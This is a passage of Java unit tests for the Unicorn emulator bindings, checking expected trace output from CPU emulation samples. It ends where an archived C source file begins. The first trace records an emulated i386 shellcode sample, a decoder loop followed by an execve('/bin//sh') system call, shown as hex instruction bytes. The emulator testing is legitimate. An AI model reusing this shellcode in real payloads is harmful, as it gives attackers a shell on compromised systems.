"Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 
***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 
\n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + 
"Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing 
instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x100000d, instruction size = 0x4\n" + "*** EIP = 100000d ***: 66 5 3 3 \n" + "Tracing instruction at 0x1000011, instruction size = 0x2\n" + "*** EIP = 1000011 ***: 89 2 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x100001c, instruction size = 0x2\n" + "*** EIP = 100001c ***: ff e6 \n" + "Tracing instruction at 0x1000023, instruction size = 0x2\n" + "*** EIP = 1000023 ***: 31 d2 \n" + "Tracing instruction at 0x1000025, instruction size = 0x2\n" + "*** EIP = 1000025 ***: 6a b \n" + "Tracing instruction at 0x1000027, instruction size = 0x1\n" + "*** EIP = 1000027 ***: 58 \n" + "Tracing instruction at 0x1000028, instruction size = 0x1\n" + "*** EIP = 1000028 ***: 99 \n" + "Tracing instruction at 0x1000029, instruction size = 0x1\n" + "*** EIP = 1000029 ***: 52 \n" + "Tracing instruction at 0x100002a, instruction size = 0x5\n" + "*** EIP = 100002a ***: 68 2f 2f 73 68 \n" + "Tracing instruction at 0x100002f, instruction size = 0x5\n" + "*** EIP = 100002f ***: 68 2f 62 69 6e \n" + "Tracing instruction at 0x1000034, instruction size = 0x2\n" + "*** EIP = 1000034 ***: 89 e3 \n" + "Tracing instruction at 0x1000036, instruction size = 0x1\n" + "*** EIP = 1000036 ***: 52 \n" + "Tracing instruction at 0x1000037, instruction size = 0x1\n" + "*** EIP = 1000037 ***: 53 \n" + "Tracing instruction at 0x1000038, instruction 
size = 0x2\n" + "*** EIP = 1000038 ***: 89 e1 \n" + "Tracing instruction at 0x100003a, instruction size = 0x2\n" + "*** EIP = 100003a ***: cd 80 \n" + ">>> 0x100003c: interrupt 0x80, EAX = 0xb\n" + "Tracing instruction at 0x100003c, instruction size = 0x1\n" + "*** EIP = 100003c ***: 41 \n" + "Tracing instruction at 0x100003d, instruction size = 0x1\n" + "*** EIP = 100003d ***: 41 \n" + "Tracing instruction at 0x100003e, instruction size = 0x1\n" + "*** EIP = 100003e ***: 41 \n" + "Tracing instruction at 0x100003f, instruction size = 0x1\n" + "*** EIP = 100003f ***: 41 \n" + "Tracing instruction at 0x1000040, instruction size = 0x1\n" + "*** EIP = 1000040 ***: 41 \n" + "Tracing instruction at 0x1000041, instruction size = 0x1\n" + "*** EIP = 1000041 ***: 41 \n" + "Tracing instruction at 0x1000042, instruction size = 0x1\n" + "*** EIP = 1000042 ***: 41 \n" + "Tracing instruction at 0x1000043, instruction size = 0x1\n" + "*** EIP = 1000043 ***: 41 \n" + "\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testSparc() { assumeTrue(Unicorn.arch_supported(UC_ARCH_SPARC)); samples.Sample_sparc.test_sparc(); assertEquals( "Emulate SPARC code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> G3 = 0x79b9\n", outContent.toString()); } @Test public void testTricore() { assumeTrue(Unicorn.arch_supported(UC_ARCH_TRICORE)); samples.Sample_tricore.test_tricore(); assertEquals( "Emulate TriCore code\n" + ">>> Tracing basic block at 0x10000, block size = 0x6\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Tracing instruction at 0x10002, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> d0 = 0x8000\n" + ">>> d1 = 0x1\n", outContent.toString()); } @Test public void testX86_16() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_16(); assertEquals( "Emulate x86 16-bit code\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> Read 1 bytes from [0xb] = 0x7\n", outContent.toString()); } @Test public void testX86MissCode() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_miss_code(); assertEquals( "Emulate i386 code - missing code\n" + ">>> Allocating block at 0x1000000 (0x1000000), block size = 0x1 (0x1000)\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n", outContent.toString()); } @Test public void testX86() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386(); assertEquals( "Emulate i386 code\n" + ">>> Tracing basic block at 0x1000000, block size = 0x6\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> XMM0 = 0x00112233445566778899aabbccddeeff\n" + ">>> Read 4 bytes from [0x1000000] = 0xf664a41\n", outContent.toString()); } @Test public void testX86MapPtr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_map_ptr(); assertEquals( "Emulate i386 code - use uc_mem_map_ptr()\n" + ">>> Tracing basic block at 0x1000000, block size = 0x6\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> Read 4 bytes from [0x1000000] = 0xf664a41\n", outContent.toString()); } @Test public void testX86InOut() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_inout(); assertEquals( "Emulate i386 code with IN/OUT instructions\n" + ">>> Tracing basic block at 0x1000000, block size = 0x7\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x2\n" + "--- reading from port 0x3f, size: 1, address: 0x1000001\n" + ">>> Tracing instruction at 0x1000003, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000004, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x96\n" + "--- writing to port 0x46, size: 1, value: 0xf1, address: 0x1000004\n" + "--- register value = 0xf1\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x96\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x12f1\n" + ">>> ECX = 0x678a\n", outContent.toString()); } @Test public void testX86ContextSave() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_context_save(); assertEquals( "Save/restore CPU context in opaque blob\n" + ">>> Running emulation for the first time\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x2\n" + ">>> Saving CPU context\n" + ">>> Running emulation for the second time\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x3\n" + ">>> CPU context restored. Below is the CPU context\n" + ">>> EAX = 0x2\n" + ">>> CPU context restored with modification. Below is the CPU context\n" + ">>> EAX = 0xc8\n", outContent.toString()); } @Test public void testX86Jump() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_jump(); assertEquals( "Emulate i386 code with jump\n" + ">>> Tracing basic block at 0x1000000, block size = 0x2\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Emulation done. Below is the CPU context\n", outContent.toString()); } @Test public void testX86Loop() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_loop(); assertEquals( "Emulate i386 code that loop forever\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n", outContent.toString()); } @Test public void testX86InvalidMemRead() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_read(); assertEquals( "Emulate i386 code that read from invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x8\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> --- EFLAGS is 0x2\n" + "uc.emu_start failed as expected: " + "unicorn.UnicornException: Invalid memory read (UC_ERR_READ_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1234\n" + ">>> EDX = 0x7890\n", outContent.toString()); } @Test public void testX86InvalidMemWrite() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_write(); assertEquals( "Emulate i386 code that write to invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x8\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Missing memory is being WRITE at 0xaaaaaaaa, data size = 4, data value = 0x1234\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000007, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> Read 4 bytes from [0xaaaaaaaa] = 0x1234\n" + ">>> Failed to read 4 bytes from [0xffffffaa]\n", outContent.toString()); } @Test public void testX86JumpInvalid() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_jump_invalid(); assertEquals( "Emulate i386 code that jumps to invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x5\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x5\n" + ">>> --- EFLAGS is 0x2\n" + "uc.emu_start failed as expected: " + "unicorn.UnicornException: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1234\n" + ">>> EDX = 0x7890\n", outContent.toString()); } @Test public void testX86_64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_64(); assertEquals( "Emulate x86_64 code\n" + ">>> Tracing basic block at 0x1000000, block size = 0x4b\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> RIP is 0x1000000\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x3\n" + ">>> RIP is 0x1000006\n" + ">>> Tracing instruction at 0x1000009, instruction size = 0x1\n" + ">>> RIP is 0x1000009\n" + ">>> Tracing instruction at 0x100000a, instruction size = 0x4\n" + ">>> RIP is 0x100000a\n" + ">>> Tracing instruction at 0x100000e, instruction size = 0x3\n" + ">>> RIP is 0x100000e\n" + ">>> Tracing instruction at 0x1000011, instruction size = 0x1\n" + ">>> RIP is 0x1000011\n" + ">>> Tracing instruction at 0x1000012, instruction size = 0x7\n" + ">>> RIP is 0x1000012\n" + ">>> Memory is being WRITE at 0x11ffff8, data size = 8, data value = 0x3c091e6a\n" + ">>> Memory is being READ at 0x11ffff8, data size = 8\n" + ">>> Emulation done. 
Below is the CPU context\n" + ">>> RAX = 0xdb8ee18208cd6d03\n" + ">>> RBX = 0xd87b45277f133ddb\n" + ">>> RCX = 0x3c091e6a\n" + ">>> RDX = 0x25b8d5a4dbb38112\n" + ">>> RSI = 0xb3db18ac5e815ca7\n" + ">>> RDI = 0x48288ca5671c5492\n" + ">>> R8 = 0xec45774f00c5f682\n" + ">>> R9 = 0xc118b68e7fcfeeff\n" + ">>> R10 = 0x596b8d4f\n" + ">>> R11 = 0xe17e9dbec8c074aa\n" + ">>> R12 = 0x595f72f6b9d8cf32\n" + ">>> R13 = 0xea5b108cc2b9ab1f\n" + ">>> R14 = 0x595f72f6e4017f6e\n" + ">>> R15 = 0x3e04f60c8f7ecbd7\n", outContent.toString()); } @Test public void testX86_64Syscall() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_64_syscall(); assertEquals( "Emulate x86_64 code with 'syscall' instruction\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> RAX = 0x200\n", outContent.toString()); } @Test public void testX86InvalidMemReadInTb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_read_in_tb(); assertEquals( "Emulate i386 code that read invalid memory in the middle of a TB\n" + "uc.emu_start() failed BY DESIGN with error returned: " + "unicorn.UnicornException: Invalid memory read (UC_ERR_READ_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EIP = 0x1000001\n" + ">>> The PC is correct after reading unmapped memory in the middle of TB.\n", outContent.toString()); } @Test public void testX86SmcXor() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_smc_xor(); assertEquals( "Emulate i386 code that modfies itself\n" + ">>> Emulation done. Below is the result.\n" + ">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x82e8fcf5\n", outContent.toString()); } @Test public void testX86Mmio() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_mmio(); assertEquals( "Emulate i386 code that uses MMIO\n" + ">>> Write value 0x3735928559 to IO memory at offset 0x4 with 0x4 bytes\n" + ">>> Read IO memory at offset 0x4 with 0x4 bytes and return 0x19260817\n" + ">>> Emulation done. 
ECX=0x19260817\n", outContent.toString()); } @Test public void testX86HookMemInvalid() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_hook_mem_invalid(); assertEquals( "Emulate i386 code that triggers invalid memory read/write.\n" + ">>> We have to add a map at 0x8000 before continue execution!\n" + ">>> We have to add a map at 0x10000 before continue execution!\n", outContent.toString()); } @Test public void testX86Mmr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86_mmr.test_x86_mmr(); assertEquals( "Test x86 MMR read/write\n" + ">>> EAX = 0xdddddddd\n" + ">>> LDTR.base = 0x22222222\n" + ">>> LDTR.limit = 0x33333333\n" + ">>> LDTR.flags = 0x44444444\n" + ">>> LDTR.selector = 0x5555\n" + "\n" + ">>> GDTR.base = 0x77777777\n" + ">>> GDTR.limit = 0x8888\n", outContent.toString()); } @Test public void testX86Gdt() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86_mmr.gdt_demo(); assertEquals( "Demonstrate GDT usage\n" + "Executing at 0x1000000, ilen = 0x5\n" + "mem write at 0x120ffc, size = 4, value = 0x1234567\n" + "Executing at 0x1000005, ilen = 0x5\n" + "mem write at 0x120ff8, size = 4, value = 0x89abcdef\n" + "Executing at 0x100000a, ilen = 0xb\n" + "mem write at 0x7efdd000, size = 4, value = 0x1234567\n" + "Executing at 0x1000015, ilen = 0xb\n" + "mem write at 0x7efdd004, size = 4, value = 0x89abcdef\n" + "efcdab8967452301\n", outContent.toString()); } } unicorn-2.1.1/bindings/java/unicorn_Unicorn.c000066400000000000000000001377421467524106700212560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the 